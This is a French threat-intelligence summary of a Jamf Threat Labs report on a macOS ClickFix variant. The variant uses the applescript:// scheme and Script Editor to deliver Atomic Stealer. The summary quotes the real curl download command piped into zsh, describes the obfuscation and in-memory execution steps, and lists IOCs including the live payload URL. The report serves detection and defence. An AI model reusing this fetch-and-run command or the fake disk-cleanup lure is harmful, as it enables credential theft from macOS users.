🔍 Contexte

Publié le 8 avril 2026 par Jamf Threat Labs (auteur : Thijs Xhaflaire), cet article documente une nouvelle variante de la technique ClickFix ciblant macOS, découverte via des détections comportementales de la plateforme Jamf Protect.

🎯 Technique d’attaque

Contrairement aux campagnes ClickFix classiques qui incitent l’utilisateur à coller des commandes dans Terminal, cette variante exploite le schéma URL applescript:// pour déclencher directement l’ouverture de Script Editor depuis le navigateur.

Le déroulement est le suivant :

  • L’utilisateur visite une fausse page web à thème Apple prétendant aider à « récupérer de l’espace disque »
  • Un bouton « Execute » déclenche le schéma applescript:// depuis le navigateur
  • Le navigateur invite l’utilisateur à autoriser l’ouverture de Script Editor
  • Un script pré-rempli est présenté à l’utilisateur pour exécution

⚙️ Chaîne d’exécution et payload

Une fois le script exécuté dans Script Editor, la commande suivante est lancée (obfusquée via tr) :

  • Désobfuscation : utilisation de tr pour transformer une chaîne encodée en URL valide
  • Récupération du payload : curl -kSsfL https://dryvecar[.]com/curl/04566d1d3f9717b2e7e6b643775d9ca72cef942f6df9ce075cf8c73a1bd2565a
  • Exécution en mémoire : le contenu téléchargé est pipé directement vers zsh sans écriture sur disque
  • Second stage : payload encodé en base64 + gzip (ou bunzip2 selon les variantes)
  • Payload final : un binaire Mach-O (variante récente d’Atomic Stealer) déposé dans /tmp, dont les attributs étendus sont supprimés avant exécution

🛡️ Contexte défensif

Apple a introduit dans macOS 26.4 une fonctionnalité de sécurité qui analyse les commandes collées dans Terminal avant exécution. Cette campagne illustre comment les attaquants contournent ce contrôle en changeant de vecteur d’exécution. Sur macOS 26.0, aucune invite supplémentaire n’est présentée ; sur macOS 26.4, un avertissement demande à l’utilisateur d’autoriser la sauvegarde du script sur disque.

📄 Nature de l’article

Il s’agit d’une analyse technique publiée par un laboratoire de recherche en sécurité, visant à documenter une nouvelle variante de technique ClickFix sur macOS et à fournir des indicateurs de compromission exploitables.

🧠 TTPs et IOCs détectés

TTP

  • T1204.001 — User Execution: Malicious Link (Execution)
  • T1059.002 — Command and Scripting Interpreter: AppleScript (Execution)
  • T1027 — Obfuscated Files or Information (Defense Evasion)
  • T1140 — Deobfuscate/Decode Files or Information (Defense Evasion)
  • T1105 — Ingress Tool Transfer (Command and Control)
  • T1620 — Reflective Code Loading (Defense Evasion)
  • T1036 — Masquerading (Defense Evasion)
  • T1555 — Credentials from Password Stores (Credential Access)

IOC

  • Domaines : dryvecar.comVT · URLhaus · ThreatFox
  • URLs : https://dryvecar.com/curl/04566d1d3f9717b2e7e6b643775d9ca72cef942f6df9ce075cf8c73a1bd2565aURLhaus
  • Chemins : /tmp

Malware / Outils

  • Atomic Stealer (stealer)

🔗 Source originale : https://www.jamf.com/blog/clickfix-macos-script-editor-atomic-stealer/